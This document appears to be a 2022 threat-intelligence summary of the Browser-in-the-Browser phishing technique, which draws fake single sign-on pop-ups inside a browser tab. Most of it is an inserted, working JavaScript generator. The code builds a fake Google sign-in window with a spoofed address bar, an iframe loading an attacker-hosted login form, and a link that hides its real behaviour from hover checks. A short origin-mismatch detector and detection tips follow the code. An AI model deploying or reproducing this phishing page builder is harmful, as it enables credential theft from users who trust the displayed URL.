2022-03-29

New Attack: Browser-in-the-Browser (BITB)

Industry: N/A | Level: Strategic | Source: mrd0x

A security researcher using the handle "mr.d0x" has published a new Browser-in-the-Browser (BITB) phishing technique: a fake browser pop-up window, drawn entirely inside the real browser tab, whose address bar shows a spoofed but legitimate-looking URL. The researcher set out to test whether there is a way to "make the 'Check the URL' advice less reliable," and confirmed it by imitating the authentication pop-up windows that Google, Microsoft, Apple and other providers open for Single Sign-On (SSO). The BITB attack replicates that pop-up with an illegitimate duplicate built from HTML and CSS: "replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it's basically indistinguishable." Because the pop-up is not a real browser window, the URL in its address bar is plain text chosen by the attacker, and anything typed into the iframe is submitted to the attacker's server. The technique also defeats the hover-to-inspect check through JavaScript, as the researcher explains: "If an onclick event that returns false is added, then hovering over the link will continue to show the website in the href attribute but when the link is clicked then the href attribute is ignored."
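The two pieces described above, the HTML/CSS window chrome around an iframe and the trigger link whose href is never followed, as an added example written for this summary (it is not mr.d0x's code from the original post). The hostnames accounts.google.com and phish.example, the element id "bitb" and the helper names are assumptions for illustration. The block is plain Node.js-runnable JavaScript that generates the page markup as a string, plus a small defender-side check that compares the URL printed in the fake address bar with the iframe's real origin.

```javascript
// Added example (not from the original post): minimal Browser-in-the-Browser page
// generator. The "window" is a styled <div> inside the real tab; only the <iframe>
// loads real content, and it loads from the attacker's server, not from the domain
// printed in the fake address bar. Hostnames and ids below are placeholders (assumed).

const LEGIT_URL = "https://accounts.google.com";              // what the victim expects to see
const PHISH_IFRAME = "https://phish.example/sso-google.html"; // attacker-hosted login form (assumed)

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Fake window chrome: title bar with traffic-light buttons, an address bar with a
// padlock and the spoofed URL, then an iframe that fills the fake "viewport".
function buildFakeWindow(spoofedUrl, iframeSrc) {
  return `
<div id="bitb" style="display:none;position:fixed;top:120px;left:200px;width:480px;height:560px;
  border:1px solid #999;border-radius:8px;background:#fff;box-shadow:0 8px 32px rgba(0,0,0,.35);font-family:sans-serif">
  <div style="height:32px;background:#e8e8e8;border-radius:8px 8px 0 0;display:flex;align-items:center;padding:0 8px">
    <span style="width:12px;height:12px;border-radius:50%;background:#ff5f57;margin-right:6px"></span>
    <span style="width:12px;height:12px;border-radius:50%;background:#febc2e;margin-right:6px"></span>
    <span style="width:12px;height:12px;border-radius:50%;background:#28c840"></span>
    <span style="margin-left:auto;font-size:12px">Sign in - Google Accounts</span>
  </div>
  <div style="height:28px;background:#f5f5f5;display:flex;align-items:center;padding:0 10px;font-size:13px">
    <span style="margin-right:6px">&#128274;</span><span>${escapeHtml(spoofedUrl)}</span>
  </div>
  <iframe src="${escapeHtml(iframeSrc)}" style="width:100%;height:calc(100% - 60px);border:0"></iframe>
</div>`;
}

// The trigger link: href points at the real provider, so hovering shows a
// legitimate URL, but onclick returns false so the href is never followed
// and the fake window is shown instead.
function buildTriggerLink(legitUrl) {
  return `<a href="${escapeHtml(legitUrl)}" ` +
    `onclick="document.getElementById('bitb').style.display='block';return false">` +
    `Sign in with Google</a>`;
}

function buildBitbPage({ spoofedUrl = LEGIT_URL, iframeSrc = PHISH_IFRAME } = {}) {
  return `<!doctype html><html><body>${buildTriggerLink(spoofedUrl)}` +
    `${buildFakeWindow(spoofedUrl, iframeSrc)}</body></html>`;
}

// Defender-side check over a captured page: the URL text shown in the fake
// address bar and the iframe's actual origin disagree. Returns both origins
// (or null if the page has no such pair) so a reviewer can compare them.
function iframeOriginMismatch(html) {
  const iframe = /<iframe[^>]*\ssrc="([^"]+)"/i.exec(html);
  const shownUrl = /<span>(https?:\/\/[^<]+)<\/span>/i.exec(html);
  if (!iframe || !shownUrl) return null;
  const real = new URL(iframe[1]).origin;
  const shown = new URL(shownUrl[1]).origin;
  return { shown, real, mismatch: shown !== real };
}

// Stand-alone usage: print the generated page and the mismatch report.
const page = buildBitbPage();
console.log(page);
console.log(iframeOriginMismatch(page));
```

Two tells follow directly from how the markup is built: the fake window is a positioned element inside the tab, so it cannot be dragged past the edge of the real browser window, and a password manager will not offer the victim's accounts.google.com credentials because the iframe's real origin is the attacker's host.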
